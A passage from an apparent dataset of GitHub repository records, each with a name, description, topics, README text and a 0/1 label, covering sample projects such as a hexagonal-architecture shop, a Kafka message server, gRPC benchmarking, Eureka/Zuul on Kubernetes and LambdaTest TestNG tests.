Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-quarkus/). * [Part 5: Hexagonal Architecture with Spring Boot - Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-spring-boot/). # Branches ## `main` In the `main` branch, you'll find the application implemented without an application framework. It's only using: * [RESTEasy](https://resteasy.dev/) (implementing [Jakarta RESTful Web Services](https://jakarta.ee/specifications/restful-ws/)), * [Hibernate](https://hibernate.org/) (implementing [Jakarta Persistence API](https://jakarta.ee/specifications/persistence/)), and * [Undertow](https://undertow.io/) as a lightweight web server. ## `without-jpa-adapters` In the `without-jpa-adapters` branch, you'll find the application implemented without an application framework and without JPA adapters. It's only using RESTEasy and Undertow. ## `with-quarkus` In the `with-quarkus` branch, you'll find an implementation using [Quarkus](https://quarkus.io/) as application framework. ## `with-spring` In the `with-quarkus` branch, you'll find an implementation using [Spring](https://spring.io/) as application framework. # Architecture Overview The source code is separated into four modules: * `model` - contains the domain model * `application` - contains the domain services and the ports of the hexagon * `adapters` - contains the REST, in-memory and JPA adapters * `boostrap` - contains the configuration and bootstrapping logic The following diagram shows the hexagonal architecture of the application along with the source code modules: ![Hexagonal Architecture Modules](doc/hexagonal-architecture-modules.png) The `model` module is not represented as a hexagon because it is not defined by the Hexagonal Architecture. Hexagonal Architecture leaves open what happens inside the application hexagon. # How to Run the Application The easiest way to run the application is to start the `main` method of the `Launcher` class (you'll find it in the `boostrap` module) from your IDE. You can use one of the following VM options to select a persistence mechanism: * `-Dpersistence=inmemory` to select the in-memory persistence option (default) * `-Dpersistence=mysql` to select the MySQL option If you selected the MySQL option, you will need a running MySQL database. The easiest way to start one is to use the following Docker command: ```shell docker run --name hexagon-mysql -d -p3306:3306 \ -e MYSQL_DATABASE=shop -e MYSQL_ROOT_PASSWORD=test mysql:8.1 ``` The connection parameters for the database are hardcoded in `RestEasyUndertowShopApplication.initMySqlAdapter()`. If you are using the Docker container as described above, you can leave the connection parameters as they are. Otherwise, you may need to adjust them. # Example Curl Commands The following `curl` commands assume that you have installed `jq`, a tool for pretty-printing JSON strings. ## Find Products The following queries return one and two results, respectively: ```shell curl localhost:8080/products/?query=plastic | jq curl localhost:8080/products/?query=monitor | jq ``` The response of the second query looks like this: ```json [ { "id": "K3SR7PBX", "name": "27-Inch Curved Computer Monitor", "price": { "currency": "EUR", "amount": 159.99 }, "itemsInStock": 24081 }, { "id": "Q3W43CNC", "name": "Dual Monitor Desk Mount", "price": { "currency": "EUR", "amount": 119.9 }, "itemsInStock": 1079 } ] ``` ## Get a Cart To show the cart of user 61157 (this cart is empty when you begin): ```shell curl localhost:8080/carts/61157 | jq ``` The response should look like this: ```json { "lineItems": [], "numberOfItems": 0, "subTotal": null } ``` ## Adding Products to a Cart Each of the following commands adds a product to the cart and returns the contents of the cart after the product is added (note that on Windows, you have to replace the single quotes with double quotes): ```shell curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq curl -X POST 'localhost:8080/carts/61157/line-items?productId=K3SR7PBX&quantity=2' | jq curl -X POST 'localhost:8080/carts/61157/line-items?productId=Q3W43CNC&quantity=1' | jq curl -X POST 'localhost:8080/carts/61157/line-items?productId=WM3BPG3E&quantity=3' | jq ``` After executing two of the four commands, you can see that the cart contains the two products. You also see the total number of items and the sub-total: ```json { "lineItems": [ { "productId": "TTKQ8NJZ", "productName": "Plastic Sheeting", "price": { "currency": "EUR", "amount": 42.99 }, "quantity": 20 }, { "productId": "K3SR7PBX", "productName": "27-Inch Curved Computer Monitor", "price": { "currency": "EUR", "amount": 159.99 }, "quantity": 2 } ], "numberOfItems": 22, "subTotal": { "currency": "EUR", "amount": 1179.78 } } ``` This will increase the number of plastic sheetings to 40: ```shell curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq ``` ### Producing an Error Message Trying to add another 20 plastic sheetings will result in error message saying that there are only 55 items in stock: ```shell curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq ``` This is how the error response looks like: ```json { "httpStatus": 400, "errorMessage": "Only 55 items in stock" } ``` ## Emptying the Cart To empty the cart, send a DELETE command to its URL: ```shell curl -X DELETE localhost:8080/carts/61157 ``` To verify it's empty: ```shell curl localhost:8080/carts/61157 | jq ``` You'll see an empty cart again.
1
TinkerPatch/tinkerpatch-andresguard-sample
A easy tinkerpatch sample integrated with andresgaurd
null
# tinkerpatch-andresguard-sample [ ![Download](https://api.bintray.com/packages/simsun/maven/tinkerpatch-android-sdk/images/download.svg) ](https://bintray.com/simsun/maven/tinkerpatch-android-sdk/_latestVersion) [![Join Slack](https://slack.tinkerpatch.com/badge.svg)](https://slack.tinkerpatch.com) 集成[AndResGuard](https://github.com/shwenzhang/AndResGuard)的例子。 只需copy`andresguard.gradle`到你的工程中,并在`tinkerpatch.gradle`文件中增加如下代码: ```gradle /** * 引入 AndResGuard的相关配置 */ project.ext { TP_BAKPATH = bakPath TP_BASEINFO = baseInfo TP_VARIANTNAME = variantName } apply from: 'andresguard.gradle' ``` 如果你开启资源混淆,备份文件夹中会多出`*-resource_mapping.txt`和`-andresguard.apk`文件。带有后缀`-andresguard`为资源混淆过的安装包。 [更多集成文档](http://tinkerpatch.com/Docs/intro)
1
IntuitDeveloper/SampleApp-CRUD-Java
Java sample app to show how to define basic CRUD operations for entities available in the QuickBooks API
java java-sample quickbooks sampleapp-crud-java
[![Rate your Sample](views/Ratesample.png)][ss1][![Yes](views/Thumbup.png)][ss2][![No](views/Thumbdown.png)][ss3] # SampleApp-CRUD-Java SampleApp-CRUD-Java <p>Welcome to the Intuit Developer's Java Sample App for CRUD operations.</p> <p>This sample app is meant to provide working examples of how to integrate your app with the Intuit Small Business ecosystem. Specifically, this sample application demonstrates the following:</p> <ul> <li>Create, Read, Query, Update, Delete, Void entities.</li> <li>All operations are performed using QuickBooks Java SDK.</li> </ul> <p>Please note that while these examples work, features not called out above are not intended to be taken and used in production business applications. In other words, this is not a seed project to be taken cart blanche and deployed to your production environment.</p> <p>For example, certain concerns are not addressed at all in our samples (e.g. security, privacy, scalability). In our sample apps, we strive to strike a balance between clarity, maintainability, and performance where we can. However, clarity is ultimately the most important quality in a sample app.</p> <p>Therefore there are certain instances where we might forgo a more complicated implementation (e.g. caching a frequently used value, robust error handling, more generic domain model structure) in favor of code that is easier to read. In that light, we welcome any feedback that makes our samples apps easier to learn from.</p> ## Table of Contents * [Requirements](#requirements) * [First Use Instructions](#first-use-instructions) * [Running the code](#running-the-code) * [Project Structure](#project-structure) ## Requirements In order to successfully run this sample app you need a few things: 1. Java 1.8 2. A [developer.intuit.com](http://developer.intuit.com) account 3. An app on [developer.intuit.com](http://developer.intuit.com) and the associated app token, consumer key, and consumer secret. 4. One sandbox company, connect the company with your app and generate the oauth tokens. 5. QuickBooks Java SDK, download from [here](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.intuit.quickbooks-online%22) (see instructions in "Running the code" section on how to include it) ## First Use Instructions 1. Clone the GitHub repo to your computer 2. Import the project in Eclipse or any other IDE of your choice 3. In [`config.properties`](src/main/resources/config.properties), set oauth.type as 1 or 2 depending on type of app you have. For OAuth2 apps set value as 2. 4. For OAuth2 apps, fill in the [`config.properties`](src/main/resources/config.properties) file values (realmid, oauth2.accessToken). 5. For OAuth1 apps, fill in the [`config.properties`](src/main/resources/config.properties) file values (realmId, app token, consumer key, consumer secret, access token key, access token secret). 5. Run maven install. Note: If you do not want to use maven, just import the project and add the jars to your project externally. ## Running the code This app is directed to provide individual sample code for CRUD operations for various QBO entities. Each class has a main method that can be run individually. Steps described below is to run the class for creating a customer in Eclipse IDE. 1. Go to CustomerCreate.java in package com.intuit.developer.sampleapp.crud.entities.customer 2. Right click the file and Run as Java application 3. On the console you'll see the log being generated with the new customer id. Follow similar steps for other classes. Notes: 1. The sample code has been implemented for US locale company, certain fields may not be applicable for other locales or minor version. Care should be taken to handle such scenarios separately. 2. Before running AttachableUpload sample, update the path of the pdf that you wish to upload to point to your local directory. ## Project Structure **Standard Java coding structure is used for the sample app** * Java code for CRUD operations are located under [`entities`](src/main/java/com/intuit/developer/sampleapp/crud/entities) directory for each entitiy * Java code for Helper Classes are located under [`helper`](src/main/java/com/intuit/developer/sampleapp/crud/helper) directory for each entitiy * Java code for QBO DataService object are located under [`qbo`](src/main/java/com/intuit/developer/sampleapp/crud/qbo) directory * Config files are located in the [`resources`](src/main/resources) directory [ss1]: # [ss2]: https://customersurveys.intuit.com/jfe/form/SV_9LWgJBcyy3NAwHc?check=Yes&checkpoint=SampleApp-CRUD-Java&pageUrl=github [ss3]: https://customersurveys.intuit.com/jfe/form/SV_9LWgJBcyy3NAwHc?check=No&checkpoint=SampleApp-CRUD-Java&pageUrl=github
1
AudioRoute/AudioRoute-SDK
AudioRoute SDK and sample projects (Delay effect, Simple synth and Hostsample host)
null
# AudioRoute Connect Android Audio apps To add AudioRoute SDK to your music app please check the Developer guide https://audioroute.ntrack.com/developer-guide.php Linking to the .so files is required only for host apps. Hosted apps only need to include the header files. ©2018-2019 n-Track S.r.l. Loosely based on Patchfield written by Peter Brinkmann ©2013 Google: https://github.com/google/patchfield
1
WASdev/sample.daytrader7
The DayTrader 7 benchmark sample, which is a Java EE 7 application built around the paradigm of an online stock trading system. #JavaEE7
null
# sample.daytrader7 [![Build Status](https://travis-ci.org/WASdev/sample.daytrader7.svg?branch=master)](https://travis-ci.org/WASdev/sample.daytrader7) # Java EE7: DayTrader7 Sample Java EE7 DayTrader7 Sample This sample contains the DayTrader 7 benchmark, which is an application built around the paradigm of an online stock trading system. The application allows users to login, view their portfolio, lookup stock quotes, and buy or sell stock shares. With the aid of a Web-based load driver such as Apache JMeter, the real-world workload provided by DayTrader can be used to measure and compare the performance of Java Platform, Enterprise Edition (Java EE) application servers offered by a variety of vendors. In addition to the full workload, the application also contains a set of primitives used for functional and performance testing of various Java EE components and common design patterns. DayTrader is an end-to-end benchmark and performance sample application. It provides a real world Java EE workload. DayTrader's new design spans Java EE 7, including the new WebSockets specification. Other Java EE features include JSPs, Servlets, EJBs, JPA, JDBC, JSF, CDI, Bean Validation, JSON, JMS, MDBs, and transactions (synchronous and asynchronous/2-phase commit). This sample can be installed onto WAS Liberty runtime versions 8.5.5.6 and later. A prebuilt derby database is provided in resources/data To run this sample, first [download](https://github.com/WASdev/sample.daytrader7/archive/master.zip) or clone this repo - to clone: ``` git clone git@github.com:WASdev/sample.daytrader7.git ``` From inside the sample.daytrader7 directory, build and start the application in Open Liberty with the following command: ``` mvn install cd daytrader-ee7 mvn liberty:run ``` Once the server has been started, go to [http://localhost:9082/daytrader](http://localhost:9082/daytrader) to interact with the sample. ### To containerize the application with DB2, you can run command ``` docker build -t sample-daytrader7 -f Containerfile_db2 . ``` ## Notice © Copyright IBM Corporation 2015. ## License ```text Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ````
0
abhioncbr/Kafka-Message-Server
Example application based on Apache Kafka framework to show it usage as distributed message server. Exploring this sample application help users to understand how good and easy is Apache Kafka usage.
null
Kafka-Message-Server Example Application ======================================== Apache kafka is yet another precious gem from Apache Software Foundation. Kafka was originally developed at Linkedin and later on became a member of Apache project. Apache Kafka is a distributed publish-subscribe messaging system. Kafka differs from traditional messaging system as it is designed as distributed system, persists messages on disk and supports multiple subscribers. Kafka-Message-Server is an sample application for demonstrating kafka usage as message-server. Please follow the below instructions for productive use of the sample application. 1) Download Apache kafka version 0.8.0 zip file from kafka download page and extract it. 2) There is no need to set hadoop or zookeper in your system. You can use zookeper startup script present in bin folder of Kafka. 3) For the execution of the sample application - copy 'kafka-message-server-example-0.8.0.jar' in to the kafka folder where 'kafka_2.8.0-0.8.0.jar' is present. Sample application is dependent on 'commons-cli-1.1.jar'. Copy 'commons-cli-1.1.jar' in to the 'libs' folder of the Apache Kafka. 4) Copy following scripts from 'Kafka-Message-Server-Example/config' folder in to 'bin' folder of kafka a) java-mail-content-producer.sh b) java-mail-consumer-demo.sh c) java-mail-producer-consumer-demo.sh d) java-mail-producer-demo.sh five execution permission to the scripts using chmod command. 5) Copy 'commons-cli-1.1.jar' in to the Kafka 'libs' folder. 6) Start Zookeper server using command - bin/zookeeper-server-start.sh config/zookeeper.properties 7) Start Kafka server using command - bin/kafka-server-start.sh config/server.properties 8) Start mail content creation program using command - bin/java-mail-content-producer.sh -path [directory-path] 9) Start message server mail producer using command - bin/java-mail-producer-demo.sh -path [same directory path given above] -topic [topic name] 10) Start message server mail consumer using command - bin/java-mail-consumer-demo.sh -topic [same topic name given above]
1
recepinanc/spring-boot-grpc-benchmarking
A Sample Project to experiment gRPC and Spring Boot Together
benchmarking grpc grpc-java jmeter rest spring spring-boot
# Spring Boot and gRPC Benchmarking This project compares the performances of gRPC + Protocol Buffers and REST + JSON. The comparison is made under certain conditions which we discuss in more detail in the ***Benchmarking*** section below. Because this experiment is conducted on my local machine, I accept that it just demonstrates their **performances relative to each other**. <br/> # 📝 What I learned? ✏️ Differences **between gRPC and REST**. ✏️ The theory behind **gRPC** and **Protocol Buffer**. ✏️ Setup a simple **gRPC** **Server** and **Client**. ✏️ Make use of **protocol buffers** for **code generation**. ✏️ Integrate **REST APIs** with **Protocol Buffers**. ✏️ Do **benchmarking** with **JMeter**. <br/> # 🛠Project Structures ![sample_grpc_project_architecture](https://github.com/recepinanc/spring-boot-grpc-benchmarking/blob/main/sample_grpc_project_architecture.png) *Single Spring Boot client backed by a GRPC and a Spring Boot Servers.* <br/> ## sample-client A Spring Boot project that accepts JSON and Protocol Buffer responses. **Port:** 5000 <br/> **Endpoints** ``` // REST /rest/randomNumbers?count={n} -> Generates {n} random numbers as JSON List /rest/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object /rest/largeObjects/json?count={n} -> Generates {n} LargeObjectPOJOs as JSON List // GRPC /grpc/randomNumbers?count={n} -> Generates {n} random numbers as Protocol Buffer Object /grpc/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object ``` - `/rest/**` calls are handled by `sample-springboot-server` - `/grpc/**` calls are handled by `sample-grpc-server` > This project has `sample-grpc-codegen` as dependency in its `pom.xml`. <br/> ## sample-springboot-server <br/> A basic Spring Boot project. **Port:** 4000 <br/> **Endpoints** ``` /rest/randomNumbers?count={n} -> Generates {n} random numbers as JSON List /rest/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object /rest/largeObjects/json?count={n} -> Generates {n} LargeObjectPOJOs as JSON List ``` <br/> ## sample-grpc-server <br/> A basic gRPC Server. **Port:** 3000 <br/> **Endpoints** ``` /grpc/randomNumbers?count={n} -> Generates {n} random numbers as Protocol Buffer Object /grpc/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object ``` <br/> > This project has `sample-grpc-codegen` as dependency in its `pom.xml`. <br/> ## sample-grpc-codegen <br/> This project is the gist of the gRPC part of the main project. The sole purpose of this project is to generate the code based on the given Protobuff file to enable the Server (*sample-grpc-server*) and the Client (*sample-client*) to make Remote Procedure Calls (RPC) as if the methods they call are local methods. For this project, there's a `Sample.proto` and a `LargeObject.proto` file located under `/src/proto/`. With the help of plugins, whenever the project is compiled and installed, it generates the required code (hence we call it ***codegen***) under `/targets/generated-sources` folder. <br/> # ⏱ Benchmarking This benchmarking compares the **performances** of **"gRPC with Protocol Buffers"** against **"REST with JSON"** during **data transportation**. <br/> ## Motivation As we are all witnessing the world moving towards the microservices architecture, gRPC's popularity is on the rise. It is mainly because it is said to be more performant than REST and its drawbacks are somewhat negligible if we are planning to use it to design our internal APIs. So, I wanted to experiment with the implementation of such API, its interaction with other frameworks and, its performance compared to REST APIs using JMeter. <br/> ## Setup Compared to JSON (commonly used in REST APIs as the transfer object), Protocol Buffer offers a great performance improvement thanks to the way it represents the data during transportation. Using HTTP/1.1 with JSON is a text-based communication whereas using gRPC and protocol buffers we can make use of HTTP/2 and transport our data in binary format - which helps us increase performance and throughput. > *Disclaimer: These benchmarking tests ignore the throughput comparisons - for now - but focuses on the difference in the latency.* To clearly see the effects of using Protocol Buffers, I created a really big object as Proto and Java object, named it `LargeObject`, `LargeObjectPOJO` and tested the APIs by fetching instances of this object at different sizes - as it can be set for each endpoint with the `count` parameter. <br/> ### Constraints To be able to focus directly on the performances of data transportation and serialization/deserialization, the benchmarking setup has the following constraints: - No Database Connection - No Business Logic - No Logging To remove the effects of generating the LargeObjectResponse (proto object) and LargeObjectPOJO (java object), I call the *"SetUp Thread Group"* and let the **servers generate the objects** and **cache** them. This way I can **focus only on the performance aspect of both gRPC and REST approaches during data transportation**. <br/> ### Test Scenarios Test Scenarios can be examined under two categories: SetUp and Actual Tests. <br/> #### SetUp Thread Group SetUp Thread Group's main purpose is to trigger all endpoints individually to generate the data that other test scenarios are going to ask for and let the servers cache the responses before they are asked. <br/> #### Actual Test Thread Groups - The Test Plans scenarios start from **1 user and ramps up to 100 users in 10 seconds** *(Every second 10 requests are sent).* - The same test plan is run for both the **REST** and the **gRPC**. - There are 6 Different thread groups in total, **3 for REST** and 3 for GRPC. - Each protocol is tested against 1, 100, 1000 *LargeObjects* to test the performance differences with regards to the input size. - Thread Groups are executed sequentially *(1 Thread Group runs at a time)*. <br/> ## 📊Results ![collage](https://github.com/recepinanc/spring-boot-grpc-benchmarking/blob/main/benchmarking/response-time-graphs/collage.png) <br/> It is clear with higher amounts of data that **gRPC and Protobuff** really out-performs **REST and JSON**! <br/> **Key takeaway** *"REST might be a better choice for public-facing API Designs while gRPC can be used for internal APIs."* # 📒References GRPC Official Website: https://grpc.io/ API Design: https://cloud.google.com/apis/design/resources gRPC vs OpenAPI vs Rest APIs: https://cloud.google.com/blog/products/api-management/understanding-grpc-openapi-and-rest-and-when-to-use-them Web API Design Guidelines: https://pages.apigee.com/web-api-design-register.html gRPC vs OpenAPI: https://medium.com/apis-and-digital-transformation/openapi-and-grpc-side-by-side-b6afb08f75ed HTTP/2's effect on gRPC: https://dev.to/techschoolguru/http-2-the-secret-weapon-of-grpc-32dk Great example on how to use gRPC/Protobuf/JSON: https://www.kabisa.nl/tech/sending-data-to-the-other-side-of-the-world-json-protocol-buffers-rest-grpc/ gRPC in Java: https://blog.j-labs.pl/grpc-in-java Slack API - Great example of an RPC API Design: https://api.slack.com/methods#conversations
1
felipemeriga/Eureka-Zuul-Kubernetes
This is a sample of how to deploy a eureka server using zuul gateway in Kubernetes(EKS)
null
Spring Boot Zuul - Eureka - Kubernetes ------------------------------------------ This example demonstrates the main features of the Zuul API gateway integrated into spring cloud :<br> • Service auto registration via eureka<br> • Service registration by address<br> • Service registration by service ID<br> • Filters (logging, authentication)<br> • Serving static content<br> • Service response Aggregation through Zuul<br><br> Technology Used: <br> • Spring boot 1.5.3.RELEASE<br> • Eureka Service Discovery Client<br> • Zuul API Gateway<br><br> ## Project Contents This project contains 4 modules, where each one has it own configuration for deployment: - **Eureka-Server:** It's the main eureka server, this is the service discovery application, all the other services will register with that server. For deploying it in Kubernetes be sure that you have a very stable network environment, so this module will use a k8s statefulset. - **Account-Service:** This is a simple Spring Boot REST service, that will connect to Eureka Server enabling another services to communicate and reach this service. - **Zuul-Server:** Zuul is the api gateway that can be used either as a load balancer, ou a gateway to distribute traffic to your services. For securities best practices, the best way in disposing microservices, is exposing only the gateway to the client, to control the traffic and network distribution. Also, you can use Zuul as an authentication method, applying filters and another credentials mechanisms. - **Feign-Service:** This is another simple Spring Boot REST service, but to show the communication between services, so if you do a HTTP GET request to */node/feign*, it will call a method from account-service. ## Environments Currently there is the dev and prod profiles, the dev is for running everything in localhost, better with an IDE like IntelliJ Idea. The prod profile it's to deploying it on Kubernetes. ### Deploying to Kubernetes For deploying to kubernetes, each module has a Dockerfile for creating a docker image. So, for each service the commands for building the image is: - ***Account-Service:*** docker build -t <docker-hub-username>/account-service:latest . - ***Zuul-Server:*** docker build -t <docker-hub-username>/zuul-server:latest . - ***Eureka-Server:*** docker build -t <docker-hub-username>/eureka-server:latest . - ***Feign-Service:*** docker build -t <docker-hub-username>/feign-service:latest . After you build the image, you can push it with the command: docker push <docker-hub-username>/<service-name> In the deployment.yml file, which is used for creating the deployment and service in Kubernetes cluster, change the name of the pushed docker images. After changing the images names, deploy to kubernetes with command: kubectl apply -f deployment ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Running project locally 1. Extract and you can find four maven projects 2. Run all the project with mvn install -DskipTests Access the two micro service through the api gateway zuul-server (http://localhost:9090) : http://localhost:9090/api/account-service/account/login http://localhost:9090/api/node-service/node/1 Service Discovery through the URL : http://localhost:8761/ ## Some points: * The eureka server application must be deployed in a very stable network environment, and kubernetes statefulset helps us in ensuring stable network, in your kubernetes file, have a section for the service, and another for the statefulset. Also using statefulset, you can set DNS names that points to pods, so you can set them hardcoded to make it easier to put the eureka server url in the client configuration file. * For security reasons you can set the service of the deployed microservices as NodePort or ClusterIP, instead of LoadBalancer, because we have our gateway that will handle the redirection to the services. ## Kubernetes Services diferences: * ***ClusterIP:*** It’s the default one, giving a service allowing another apps inside the cluster to access it. * ***NodePort:*** The node port opens an specific port in all the nodes (instances), and all the requests on those ports will be redirected to the service, which will redirect to the pods. ![alt test](images/nodeport.png) * ***LoadBalancer:*** It’s the most standard way of exposing a service to the internet. If you are using EKS cluster, when you create a LoadBalancer, this load balancer will be persisted in the AWS console, and it will distribute the traffic to the service, which will reach the pods. ![alt test](images/loadbalancer.png) Kubernetes has three Object Types you should know about: * ***Pods:*** runs one or more closely related containers * ***Services:*** sets up networking in a Kubernetes cluster * ***Deployment:*** Maintains a set of identical pods, ensuring that they have the correct config and that the right number of them exist. * ***Pods:*** * Runs a single set of containers * Good for one-off dev purposes * Rarely used directly in production * ***Deployment:*** * Runs a set of identical pods * Monitors the state of each pod, updating as necessary * Good for dev * Good for production --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Link followed for design : http://microservices.io/patterns/microservices.html https://dzone.com/articles/spring-cloud-netflix-zuul-edge-serverapi-gatewayga https://www.nginx.com/blog/building-microservices-using-an-api-gateway/
1
LambdaTest/java-testng-selenium
Run TestNG and Selenium scripts on LambdaTest automation cloud. A sample repo to help you run TestNG framework based test scripts in parallel with LambdaTest
automation automation-testing cloud example examples java lambdatest selenium selenium-grid selenium-webdriver selenium4 test-automation testing testng
# Run Selenium Tests With TestNG On LambdaTest ![image](https://user-images.githubusercontent.com/70570645/171934563-4806efd2-1154-494c-a01d-1def95657383.png) <p align="center"> <a href="https://www.lambdatest.com/blog/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_bank">Blog</a> &nbsp; &#8901; &nbsp; <a href="https://www.lambdatest.com/support/docs/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_bank">Docs</a> &nbsp; &#8901; &nbsp; <a href="https://www.lambdatest.com/learning-hub/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_bank">Learning Hub</a> &nbsp; &#8901; &nbsp; <a href="https://www.lambdatest.com/newsletter/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_bank">Newsletter</a> &nbsp; &#8901; &nbsp; <a href="https://www.lambdatest.com/certification/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_bank">Certifications</a> &nbsp; &#8901; &nbsp; <a href="https://www.youtube.com/c/LambdaTest" target="_bank">YouTube</a> </p> &emsp; &emsp; &emsp; *Learn how to use TestNG framework to configure and run your Java automation testing scripts on the LambdaTest platform* [<img height="58" width="200" src="https://user-images.githubusercontent.com/70570645/171866795-52c11b49-0728-4229-b073-4b704209ddde.png">](https://accounts.lambdatest.com/register?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) ## Table Of Contents * [Pre-requisites](#pre-requisites) * [Run Your First Test](#run-your-first-test) * [Parallel Testing With TestNG](#executing-parallel-tests-using-testng) * [Local Testing With TestNG](#testing-locally-hosted-or-privately-hosted-projects) ## Pre-requisites Before you can start performing Java automation testing with Selenium, you would need to: - Install the latest **Java development environment** i.e. **JDK 1.6** or higher. We recommend using the latest version. - Download the latest **Selenium Client** and its **WebDriver bindings** from the [official website](https://www.selenium.dev/downloads/). Latest versions of Selenium Client and WebDriver are ideal for running your automation script on LambdaTest Selenium cloud grid. - Install **Maven** which supports **JUnit** framework out of the box. **Maven** can be downloaded and installed following the steps from [the official website](https://maven.apache.org/). Maven can also be installed easily on **Linux/MacOS** using [Homebrew](https://brew.sh/) package manager. ### Cloning Repo And Installing Dependencies **Step 1:** Clone the LambdaTest’s Java-TestNG-Selenium repository and navigate to the code directory as shown below: ```bash git clone https://github.com/LambdaTest/Java-TestNG-Selenium cd Java-TestNG-Selenium ``` You can also run the command below to check for outdated dependencies. ```bash mvn versions:display-dependency-updates ``` ### Setting Up Your Authentication Make sure you have your LambdaTest credentials with you to run test automation scripts. You can get these credentials from the [LambdaTest Automation Dashboard](https://automation.lambdatest.com/build?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) or by your [LambdaTest Profile](https://accounts.lambdatest.com/login?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium). **Step 2:** Set LambdaTest **Username** and **Access Key** in environment variables. * For **Linux/macOS**: ```bash export LT_USERNAME="YOUR_USERNAME" export LT_ACCESS_KEY="YOUR ACCESS KEY" ``` * For **Windows**: ```bash set LT_USERNAME="YOUR_USERNAME" set LT_ACCESS_KEY="YOUR ACCESS KEY" ``` ## Run Your First Test >**Test Scenario**: The sample [TestNGTodo1.java](https://github.com/LambdaTest/Java-TestNG-Selenium/blob/master/src/test/java/com/lambdatest/TestNGTodo1.java) tests a sample to-do list app by marking couple items as done, adding a new item to the list and finally displaying the count of pending items as output. ### Configuring Your Test Capabilities **Step 3:** In the test script, you need to update your test capabilities. In this code, we are passing browser, browser version, and operating system information, along with LambdaTest Selenium grid capabilities via capabilities object. The capabilities object in the above code are defined as: ```java DesiredCapabilities capabilities = new DesiredCapabilities(); capabilities.setCapability("browserName", "chrome"); capabilities.setCapability("version", "70.0"); capabilities.setCapability("platform", "win10"); // If this cap isn't specified, it will just get the any available one capabilities.setCapability("build", "LambdaTestSampleApp"); capabilities.setCapability("name", "LambdaTestJavaSample"); ``` You can generate capabilities for your test requirements with the help of our inbuilt [Desired Capability Generator](https://www.lambdatest.com/capabilities-generator/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium). ### Executing The Test **Step 4:** The tests can be executed in the terminal using the following command. ```bash mvn test -D suite=single.xml ``` Your test results would be displayed on the test console (or command-line interface if you are using terminal/cmd) and on LambdaTest automation dashboard. ## Run Parallel Tests Using TestNG Here is an example `xml` file which would help you to run a single test on various browsers at the same time, you would also need to generate a testcase which makes use of **TestNG** framework parameters (`org.testng.annotations.Parameters`). ```xml title="testng.xml" <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE suite SYSTEM "http://testng.org/testng-1.0.dtd"> <suite thread-count="3" name="LambaTestSuite" parallel="tests"> <test name="WIN8TEST"> <parameter name="browser" value="firefox"/> <parameter name="version" value="62.0"/> <parameter name="platform" value="WIN8"/> <classes> <class name="LambdaTest.TestNGToDo"/> </classes> </test> <!-- Test --> <test name="WIN10TEST"> <parameter name="browser" value="chrome"/> <parameter name="version" value="79.0"/> <parameter name="platform" value="WIN10"/> <classes> <class name="LambdaTest.TestNGToDo"/> </classes> </test> <!-- Test --> <test name="MACTEST"> <parameter name="browser" value="safari"/> <parameter name="version" value="11.0"/> <parameter name="platform" value="macos 10.13"/> <classes> <class name="LambdaTest.TestNGToDo"/> </classes> </test> <!-- Test --> </suite> ``` ### Executing Parallel Tests Using TestNG To run parallel tests using **TestNG**, we would have to execute the below commands in the terminal: - For the above example code ```bash mvn test ``` - For the cloned Java-TestNG-Selenium repo used to run our first sample test ```bash mvn test -D suite=parallel.xml ``` ## Testing Locally Hosted Or Privately Hosted Projects You can test your locally hosted or privately hosted projects with LambdaTest Selenium grid using LambdaTest Tunnel. All you would have to do is set up an SSH tunnel using tunnel and pass toggle `tunnel = True` via desired capabilities. LambdaTest Tunnel establishes a secure SSH protocol based tunnel that allows you in testing your locally hosted or privately hosted pages, even before they are live. Refer our [LambdaTest Tunnel documentation](https://www.lambdatest.com/support/docs/testing-locally-hosted-pages/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) for more information. Here’s how you can establish LambdaTest Tunnel. Download the binary file of: * [LambdaTest Tunnel for Windows](https://downloads.lambdatest.com/tunnel/v3/windows/64bit/LT_Windows.zip) * [LambdaTest Tunnel for macOS](https://downloads.lambdatest.com/tunnel/v3/mac/64bit/LT_Mac.zip) * [LambdaTest Tunnel for Linux](https://downloads.lambdatest.com/tunnel/v3/linux/64bit/LT_Linux.zip) Open command prompt and navigate to the binary folder. Run the following command: ```bash LT -user {user’s login email} -key {user’s access key} ``` So if your user name is lambdatest@example.com and key is 123456, the command would be: ```bash LT -user lambdatest@example.com -key 123456 ``` Once you are able to connect **LambdaTest Tunnel** successfully, you would just have to pass on tunnel capabilities in the code shown below : **Tunnel Capability** ```java DesiredCapabilities capabilities = new DesiredCapabilities(); capabilities.setCapability("tunnel", true); ``` ## Tutorials 📙 Check out our latest tutorials on TestNG automation testing 👇 * [JUnit 5 vs TestNG: Choosing the Right Framework for Automation 